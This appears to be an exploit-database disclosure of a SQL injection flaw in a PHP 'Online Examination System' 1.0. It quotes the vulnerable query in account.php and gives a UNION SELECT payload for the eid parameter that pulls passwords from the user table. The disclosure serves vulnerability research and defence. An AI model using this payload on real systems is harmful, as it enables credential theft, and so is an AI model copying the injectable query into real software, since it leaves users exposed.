# Exploit Title: Online Examination System - SQL Injection # Google Dork: N/A # Date: 2022-9-28 # Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11 # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/ # Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip # Tested on: windows 11 - XAMPP # CVE : N/A # Version: 1.0 Vulnerability Details ====================== Steps : vulnerable code in file account.php <?php if(@$_GET['q']== 'quiz' && @$_GET['step']== 2) { $eid=@$_GET['eid']; $q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " ); echo '<div class="panel" style="margin:5%">'; while($row=mysqli_fetch_array($q) ) ?> 1) Log in to the application after register new user inject payload paramter eid => eid=5589741f9ed52' union select 1,2,password,4,5 from user--